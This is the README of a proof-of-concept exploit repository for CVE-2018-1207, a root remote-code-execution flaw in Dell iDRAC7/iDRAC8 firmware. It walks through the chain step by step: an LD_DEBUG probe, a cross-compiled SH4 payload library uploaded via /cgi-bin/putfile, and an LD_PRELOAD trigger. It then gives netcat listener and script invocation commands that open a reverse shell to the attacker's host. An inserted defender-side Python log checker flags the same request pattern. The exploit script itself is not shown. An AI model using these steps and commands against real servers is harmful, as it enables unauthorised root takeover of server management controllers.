Reverse Shell CVE for iDRAC 7 & 8 with firmware 2.52.52.52 and below.

# Exploit PoC for CVE-2018-1207: Dell iDRAC7/iDRAC8 RCE (Reverse Shell)
This repository contains a proof-of-concept Python script that demonstrates a remote code execution vulnerability in iDRAC7 and iDRAC8 devices running firmware version 2.52.52.52 and below. The exploit lets an attacker run code as the root user, which can lead to a total system takeover. The script demonstrates this by using the exploit to open a reverse shell. The code in this repository is an edited version of the original exploit by Michael Gargiullo (mgargiullo).
**Disclaimer** - This code is provided for educational purposes only. You may not use this script to attack devices you do not own or for which you do not have explicit, written consent. Using this script on systems without proper authorization is illegal. I am not responsible for any misuse or damage caused by this tool. Unauthorized use can lead to severe legal consequences, including fines and jail time.
## How does this exploit work?
1. The exploit first checks whether the target is vulnerable. It does this by sending a request to the login page with a special query parameter, `?LD_DEBUG=files`. If the response contains the dynamic loader's debugging output listing which library files it is trying to load, the device is vulnerable: the CGI program is passing query parameters into its environment, where the loader honours them.
2. Once the check is complete and the device is confirmed vulnerable, the script writes a C source file; the device will execute this code when the exploit is triggered, giving us a reverse shell connection.
3. We then compile the generated C file with `sh4-linux-gnu-gcc`. Because the iDRAC runs on a SuperH (SH4) processor, the code has to be cross-compiled into a shared object (`.so`) for that architecture before the iDRAC can load it.
4. Once compilation is complete, we upload the file with a `POST` request to `/cgi-bin/putfile`, which saves it on the device as `/tmp/sshpkauthupload.tmp`.
5. After the upload, we send a `GET` request to `/cgi-bin/discover` with the `?LD_PRELOAD=/tmp/sshpkauthupload.tmp` parameter. `LD_PRELOAD` tells the dynamic loader to load the named library before any other, so the CGI process loads our `.so` from `/tmp/`.
6. Because the payload's code is in a `constructor` function, it runs immediately when the library is loaded, resulting in a reverse shell as the `root` user (the user with the highest privileges on a Linux-based system).
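Added here as a defender-side example rather than part of the PoC: a small Python checker that flags the request pattern described in the steps above (dynamic-loader variables `LD_DEBUG`/`LD_PRELOAD` in a query string, and uploads to `/cgi-bin/putfile`) in web-server access logs, plus a firmware version comparison against the 2.52.52.52 cut-off. The log lines are constructed samples, and the Combined Log Format, the `is_affected`/`classify` names and the `SAMPLE_LOG` data are assumptions, not anything produced by the iDRAC or by this script.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Last affected firmware per the description above (2.52.52.52 and below).
LAST_AFFECTED = (2, 52, 52, 52)
# Dynamic-loader variables that have no business in a CGI query string.
LOADER_VARS = {"LD_DEBUG", "LD_PRELOAD"}
UPLOAD_PATH = "/cgi-bin/putfile"

# Common/Combined Log Format; an assumption, adapt to the real log source.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def is_affected(version):
    """True if a dotted iDRAC firmware version is in the affected range."""
    parts = tuple(int(p) for p in version.strip().split("."))
    return parts <= LAST_AFFECTED

def classify(line):
    """Return findings for one access-log line (empty list if nothing matched)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    method, target = m.group("method"), m.group("target")
    url = urlsplit(target)
    findings = []
    # Keys are compared case-sensitively, exactly as the loader reads them.
    for key in parse_qs(url.query, keep_blank_values=True):
        if key in LOADER_VARS:
            findings.append(f"{key} in query string of {url.path}")
    if method == "POST" and url.path == UPLOAD_PATH:
        findings.append(f"upload via {UPLOAD_PATH}")
    return findings

# Constructed sample lines, not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /login.html HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "POST /cgi-bin/putfile HTTP/1.1" 200 12',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /cgi-bin/discover?LD_PRELOAD=/tmp/sshpkauthupload.tmp HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for finding in classify(line):
            print(LOG_RE.match(line).group("ip"), "->", finding)
```

Running the module directly prints one finding per flagged sample line; a single client producing all three findings in sequence is the full check, upload and trigger pattern from the steps above.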
## Requirements
Before running the script, please ensure you have the following:
- Python3
- Python3's requests module (can be installed via `pip install requests`)
- SH4 C Cross-Compiler (can be installed via `sudo apt install gcc-sh4-linux-gnu`)
Without these requirements you will run into errors and the exploit will not be able to run fully! The script performs no checks to ensure they are installed.
## Usage
1. Start a listener on your machine to catch the reverse shell; Netcat works for this.
```bash
nc -lvnp <LPORT>
```
Replace `<LPORT>` with the port you want to listen on (e.g., `5000`).
2. Run the script with the required arguments.
```bash
python3 cve-2018-1207.py --rhost <RHOST> --rport <RPORT> --lhost <LHOST> --lport <LPORT>
```
### Arguments
* `--rhost`: The IP address of the target iDRAC.
* `--rport`: The port of the iDRAC web interface (usually `443`).
* `--lhost`: Your local IP address for the reverse shell to connect back to.
* `--lport`: Your local port that the Netcat listener is running on.
* `--keep-payload`: (Optional) If set, the script will not delete `payload.c` and `payload.so` from your machine after execution.
### Example
1. Attacker machine (IP: 192.168.1.100) - Start the listener.
```bash
nc -lvnp 5000
```
2. Attacker machine - Run the exploit against an iDRAC at `192.168.1.50`.
```bash
python3 cve-2018-1207.py --rhost 192.168.1.50 --rport 443 --lhost 192.168.1.100 --lport 5000
```
If successful, you will receive a shell session in your Netcat terminal, in which you can run commands such as `racadm`.